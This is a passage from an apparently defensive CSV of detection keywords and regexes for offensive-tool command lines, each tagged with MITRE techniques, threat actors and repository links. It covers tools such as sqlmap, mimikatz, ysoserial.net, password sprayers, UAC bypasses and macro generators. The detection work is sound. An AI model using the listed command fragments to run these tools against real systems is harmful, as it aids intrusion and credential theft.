Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2459" "* --os-bof*",".{0,1000}\s\-\-os\-bof.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","2460" "* --os-cmd whoami*",".{0,1000}\s\-\-os\-cmd\swhoami.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","2461" "* --os-pwn*",".{0,1000}\s\-\-os\-pwn.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","2463" "* --os-smbrelay*",".{0,1000}\s\-\-os\-smbrelay.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - 
TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","2464" "* ouned_smbserver.py*",".{0,1000}\souned_smbserver\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","2465" "* --outdir ldapdomaindump *",".{0,1000}\s\-\-outdir\sldapdomaindump\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2466" "* Out-Minidump.ps1*",".{0,1000}\sOut\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","2467" "* --outpath * --config *.json --backdoor*",".{0,1000}\s\-\-outpath\s.{0,1000}\s\-\-config\s.{0,1000}\.json\s\-\-backdoor.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - 
TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","2468" "* --outpath *.json --backdoor*",".{0,1000}\s\-\-outpath\s.{0,1000}\.json\s\-\-backdoor.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","2469" "* --output rootDSEs.json --dump*",".{0,1000}\s\-\-output\srootDSEs\.json\s\-\-dump.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","2470" "* -OutputAssembly ""sl0p.dll""*",".{0,1000}\s\-OutputAssembly\s\""sl0p\.dll\"".{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for Windows","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/ASkyeye/win-server2022-UAC-Bypass","1","0","N/A","N/A","9","1","0","1","2024-02-04T00:10:43Z","2021-09-25T03:36:02Z","2471" "* ovs-agent-version.nse*",".{0,1000}\sovs\-agent\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2472" "* owa * --user-as-pass *",".{0,1000}\sowa\s.{0,1000}\s\-\-user\-as\-pass\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","2473" "* owa_enum_activesync.py*",".{0,1000}\sowa_enum_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2474" "* owa_spray_activesync.py*",".{0,1000}\sowa_spray_activesync\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2475" "* owa-sprayed-creds.txt*",".{0,1000}\sowa\-sprayed\-creds\.txt.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 
- T1078.003 - T1087.002 - T1059.001","TA0006 - TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","2476" "* oxidfind -i *",".{0,1000}\soxidfind\s\-i\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","2477" "* oxidfind -n *",".{0,1000}\soxidfind\s\-n\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","N/A","10","10","279","48","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z","2478" "* -p * --amsi-bypass 
*",".{0,1000}\s\-p\s.{0,1000}\s\-\-amsi\-bypass\s.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","2479" "* -p * -d *.dll -e OpenProcess*",".{0,1000}\s\-p\s.{0,1000}\s\-d\s.{0,1000}\.dll\s\-e\sOpenProcess.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","N/A","10","8","751","88","2024-09-04T17:11:58Z","2023-02-05T13:50:15Z","2480" "* -p *\mimi.out*",".{0,1000}\s\-p\s.{0,1000}\\mimi\.out.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 
Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","2481" "* -p 1337:1337 -p 5000:5000*",".{0,1000}\s\-p\s1337\:1337\s\-p\s5000\:5000.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","2482" "* -p 4444 -c powershell*",".{0,1000}\s\-p\s4444\s\-c\spowershell.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of 
GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","0","N/A","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","2483" "* -p 4644 -n mal*",".{0,1000}\s\-p\s4644\s\-n\smal.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","N/A","9","2","112","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z","2484" "* -p 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'*",".{0,1000}\s\-p\s\'aad3b435b51404eeaad3b435b51404ee\:31d6cfe0d16ae931b73c59d7e0c089c0\'.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","0","N/A","AD Enumeration","6","4","308","66","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z","2485" "* -p ActivatorUrl*",".{0,1000}\s\-p\sActivatorUrl.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","2486" "* -p Altserialization*",".{0,1000}\s\-p\sAltserialization.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","2487" "* -p CommonsCollections1 -c whoami*",".{0,1000}\s\-p\sCommonsCollections1\s\-c\swhoami.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","2488" "* -p DotNetNuke*",".{0,1000}\s\-p\sDotNetNuke.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","2489" "* -p LastLogonTimestamp -p LastLogonUserName *",".{0,1000}\s\-p\sLastLogonTimestamp\s\-p\sLastLogonUserName\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","2490" "* -p powershell -i *.ps1 -o *.vba*",".{0,1000}\s\-p\spowershell\s\-i\s.{0,1000}\.ps1\s\-o\s.{0,1000}\.vba.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","N/A","8","6","507","123","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z","2491" "* -p pwd1.list pwd2.list *",".{0,1000}\s\-p\spwd1\.list\spwd2\.list\s.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","2492" "* -p SessionSecurityTokenHandler*",".{0,1000}\s\-p\sSessionSecurityTokenHandler.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","2493" "* -p shellcode -i *.bin -o *.vba*",".{0,1000}\s\-p\sshellcode\s\-i\s.{0,1000}\.bin\s\-o\s.{0,1000}\.vba.{0,1000}","offensive_tool_keyword","MaliciousMacroMSBuild","Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.","T1059.001 - 
T1059.003 - T1127 - T1027.002","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/MaliciousMacroMSBuild","1","0","N/A","N/A","8","6","507","123","2019-08-06T08:16:05Z","2018-04-09T23:16:30Z","2494" "* -p test_passwords.txt*",".{0,1000}\s\-p\stest_passwords\.txt.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","2495" "* -p TransactionManagerReenlist*",".{0,1000}\s\-p\sTransactionManagerReenlist.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","2496" "* -p windows/x64/exec CMD=*.exe -f rust*",".{0,1000}\s\-p\swindows\/x64\/exec\sCMD\=.{0,1000}\.exe\s\-f\srust.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","2497" "* -p windows/x64/messagebox TITLE=NovaLdr *",".{0,1000}\s\-p\swindows\/x64\/messagebox\sTITLE\=NovaLdr\s.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","2498" "*' p::d '*",".{0,1000}\'\sp\:\:d\s\'.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","2499" "* -p:AssemblyName=inveigh*",".{0,1000}\s\-p\:AssemblyName\=inveigh.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 
machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","2500" "* p2p-conficker.nse*",".{0,1000}\sp2p\-conficker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2501" "* --pacu-help*",".{0,1000}\s\-\-pacu\-help.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","2503" "* paloalto_enum_globalprotectportal.py*",".{0,1000}\spaloalto_enum_globalprotectportal\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2508" "* paloalto_spray_globalprotectportal.py*",".{0,1000}\spaloalto_spray_globalprotectportal\.py.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - 
TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","2509" "* pamspy_event.h*",".{0,1000}\spamspy_event\.h.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","2510" "* panix.sh --*",".{0,1000}\spanix\.sh\s\-\-.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","2511" "* panix.sh --generator*",".{0,1000}\spanix\.sh\s\-\-generator.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - 